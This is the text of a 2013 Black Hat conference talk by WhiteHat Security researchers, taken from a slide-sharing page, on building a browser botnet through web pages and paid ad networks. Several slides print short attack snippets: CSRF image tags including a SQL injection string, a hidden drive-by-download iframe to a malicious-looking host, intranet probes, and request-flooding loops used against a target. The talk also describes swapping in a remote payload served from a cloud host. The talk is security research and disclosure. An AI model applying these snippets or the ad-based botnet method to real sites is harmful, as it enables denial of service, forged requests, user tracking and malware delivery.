WhiteHat’s 12th Website Security Statistics [Full Report]WhiteHat’s 12th Website Security Statistics [Full Report]
WhiteHat’s 12th Website Security Statistics [Full Report]
 
Web Breaches in 2011-“This is Becoming Hourly News and Totally Ridiculous"
Web Breaches in 2011-“This is Becoming Hourly News and Totally Ridiculous"Web Breaches in 2011-“This is Becoming Hourly News and Totally Ridiculous"
Web Breaches in 2011-“This is Becoming Hourly News and Totally Ridiculous"
 
Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)
 

Recently uploaded

Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Hiroshi SHIBATA
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
2024 April Patch Tuesday
2024 April Patch Tuesday2024 April Patch Tuesday
2024 April Patch TuesdayIvanti
 
Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...
Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...
Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...panagenda
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
Connecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdfConnecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdfNeo4j
 
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better StrongerModern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better Strongerpanagenda
 
Assure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyesAssure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyesThousandEyes
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxLoriGlavin3
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Farhan Tariq
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxLoriGlavin3
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfMounikaPolabathina
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentPim van der Noll
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxLoriGlavin3
 

Recently uploaded (20)

Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
2024 April Patch Tuesday
2024 April Patch Tuesday2024 April Patch Tuesday
2024 April Patch Tuesday
 
Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...
Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...
Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
Connecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdfConnecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdf
 
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better StrongerModern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
 
Assure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyesAssure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyes
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdf
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
 

Million Browser Botnet

  • 1. Million Browser Botnet BLACK HAT USA 2013 JEREMIAH GROSSMAN Founder and CTO @jeremiahg MATT JOHANSEN Threat Research Center, Manager @mattjay
  • 2. About WhiteHat Security §  Headquartered in Santa Clara, California §  WhiteHat Sentinel: SaaS end-to-end website risk management platform (static & dynamic vulnerability assessment) §  Employees: 300+ © 2013 WhiteHat Security, Inc. 2
  • 3. © 2013 WhiteHat Security, Inc. 3 BIO Matt Johansen •  Founder & CTO of WhiteHat Security •  TED Alumni •  InfoWorld Top 25 CTO •  Co-founder of the WASC •  Co-author: XSS Attacks •  Former Yahoo! information security officer •  Brazilian Jiu-Jitsu Black Belt •  BlackHat, DEFCON, RSA Speaker •  Oversees assessment of 15,000+ websites •  Background in Penetration Testing •  Hacker turned Management •  I'm hiring… a lot… Jeremiah Grossman
  • 4. When visiting ANY web page… …by nature of the way the Web works, it has near complete control of your Web browser for as long as you are there. §  Cross-Site Request Forgery (CSRF) §  Cross-Site Scripting (XSS) §  Clickjacking §  … and various other browser tricks
  • 5. Overview: HTML / Javascript “malware” §  Browser Interrogation §  Evil Cross-Site Request Forgery §  Login-Detection §  Deanonymization §  Intranet Hacking §  Auto Cross-Site Scripting §  Drive-by-Download (Traditional Malware) §  [Distributed] Brute-Force Hash Cracking §  Application-Level DDoS
  • 6. Browser interrogation Auto-relay OS information, system settings, browser version, installed plug-ins, geo-location, etc.
  • 7. Evil CSRF (Javascript not necessarily required) Force a browser to hack ANY other website, upload / download illegal content, search for embarrassing or incriminating terms, initiate bank wire transfers, post offensive messages, vote Edward Snowden as Times Person of the Year. <img src="http://server/cart?id=‘ UNION ALL SELECT user, pass,…”> <img src="http://torrent/D1C16AB1E2330AF3C4BE06AC43ABCE1CBD78C.torrent”> <img src="http://www.google.com/search?q=Justin+Bieber+fan+club”> <img src="http://att/search?uuid=10009”><img src="http://att/search?uuid=10010”> <img src="http://server/vote?id=4”> Spoofing Google search history with CSRF http://jeremiahgrossman.blogspot.com/2010/12/spoofing-google-search-history-with.html
  • 8. Login-Detection <img src=”http://site/img.png” onload=”loggedin()” onerror=”notloggedin()” /> <script src=”http://site/javascript.js” onload=”loggedin()” onerror=”notloggedin()”></script> I Know What Websites You Are Logged-In To http://blog.whitehatsec.com/i-know-what-websites-you-are-logged-in-to-login-detection-via-csrf/ A least 6 different techniques
  • 9. Deanonymize via mouse-click (clickjack) I Know Your Name, and Probably a Whole Lot More http://blog.whitehatsec.com/i-know-your-name-and-probably-a-whole-lot-more-deanonymization-via-likejacking-followjacking-etc/
  • 10. Intranet Hacking <iframe src=”http://192.168.1.1/” onload=”detection()”></iframe> http://www.slideshare.net/jeremiahgrossman/hacking-intranet-websites-from-the-outside
  • 11. Auto-XSS <iframe src=“http://server/q=…<inject XSS payload>”></iframe> §  Steal Cookies / Session Hijacking §  Steal “saved” passwords. §  Etc.
  • 12. Traditional Malware (Drive-by-Downloads) <iframe src="http: //lotmachinesguide .cn/ in.cgi?income56" width=1 height=1 style="visibility: hidden"></iframe> §  Exploits the browser and/or extensions (0-day fun) §  A central way botnets are formed. §  Patch, patch, patch! – uninstall Java
  • 13. [Distributed] Brute-Force Hash Cracking “During our tests it has been possible to observe password guessing rates of 100,000 MD5 hashes/second in JavaScript.” - Lavakumar Kuppan
  • 14. md5-password-cracker.js by Feross Aboukhadijeh http://feross.org/hacks/md5-password-cracker.js/ Ravan http://www.andlabs.org/tools/ravan/ravan.html
  • 15. Application-Level DDoS “A browser can send a surprisingly large number of GET requests to a remote website using COR from WebWorkers. During tests it was found that around 10,000 requests/minute can be sent from a single browser.” - Lavakumar Kuppan Attacking with HTML5 https://media.blackhat.com/bh-ad-10/Kuppan/Blackhat-AD-2010-Kuppan-Attacking-with-HTML5-wp.pdf §  Does not hold open [a lot of] TCP connections, just fires a lot HTTP request synchronously.
  • 17. Connection-Limit Bypass <script> for (var i = 0; i < 300; i++) { var img = new Image(); var url = ’http://target/?' + i; img.src = url; } </script> <script> for (var i = 0; i < 300; i++) { var img = new Image(); var url = 'ftp://localhost:80/?' + i; img.src = url; } </script> Apache Killer [~300 connections]Limited to 6 connections DEMO
  • 18. Benefit of browser hacking this way… §  No “malware” to detect, no “exploits,” no zero-days required. §  No traces, few alarms. Prevent browser caching. §  Everyone’s browser is vulnerable (by default). §  Very, very easy. §  The web is supposed to work this way. Why Web Security Is Fundamentally Broken http://www.slideshare.net/jeremiahgrossman/why-web-security-is-fundamentally-broken
  • 19. Distribution of this type of “Javascript-malware” §  A high trafficked website you own (blog, warez, pr0n, etc.) §  HTML Injection on popular websites, forums etc. (XSS) §  Man-in-the-Middle (WiFi) §  [HTML] Email spam §  Search Engine Poisoning §  Compromise websites (mass SQL injection worms) §  Third-Party Web Widgets (Weather, Counters, Trackers, etc.) WE NEED TO THINK BIGGER! Third-Party Web Widget Security FAQ http://jeremiahgrossman.blogspot.com/2010/07/third-party-web-widget-security-faq.html Owning bad guys {and mafia} with javascript botnets http://www.slideshare.net/chemai64/owning-bad-guys-and-mafia-with-javascript-botnets
  • 20. “The most reliable, cost effective method to inject evil code is to buy an ad.” -Douglas Crockford
  • 22.
  • 24.
  • 25.
  • 26. Leverage Advertising Networks to… §  Browser Interrogation §  Evil Cross-Site Request Forgery §  Login-Detection §  User Deanonymization §  Intranet Hacking §  Auto Cross-Site Scripting §  Drive-by-Download (Traditional Malware) §  Cross-Domain Password Brute-Force §  [Distributed] Brute-Force Hash Cracking §  Application-Level DDoS
  • 27. Cost-per-Click (CPC) Cost-per-Thousand (CPM) Price Range: $0.01 - $5.00 (USD) Million Browser Botnet @ $0.15 (CPM) = $150 (USD) Million Browser Botnet @ $0.50 (CPM) = $500 (USD) Stolen credit cards anyone?
  • 28.
  • 29.
  • 30.
  • 31. for (var i = 0; i < 10000; i++) { var img = new Image(); var url = 'http://<amazon_aws>/iclick/id?' + i; img.src = url; } In side the banner code, we pointed a script tag to: http://ec2-23-20-141-160.compute-1.amazonaws.com/campaign.js Then we could change the javascript payload to whatever, whenever, without any approval process.
  • 32. DEMO
  • 33.
  • 34. We’re controlling someone else’s robots!
  • 35.
  • 36.
  • 37.
  • 38.
  • 39.
  • 41.
  • 42.
  • 43.
  • 44.
  • 45.
  • 46. We did ecommerce at Black Hat.
  • 47.
  • 49. “[N]obody's breaking the web, dude. Not now, not ever.” Dan Kaminsky to Jeremiah Grossman, December 21, 2010
  • 50. CONTACT THANK YOU JEREMIAH GROSSMAN Founder and CTO Twitter: @jeremiahg Email: jeremiah@whitehatsec.com MATT JOHANSEN Threat Research Center, Manager Twitter: @mattjay Email: matt@whitehatsec.com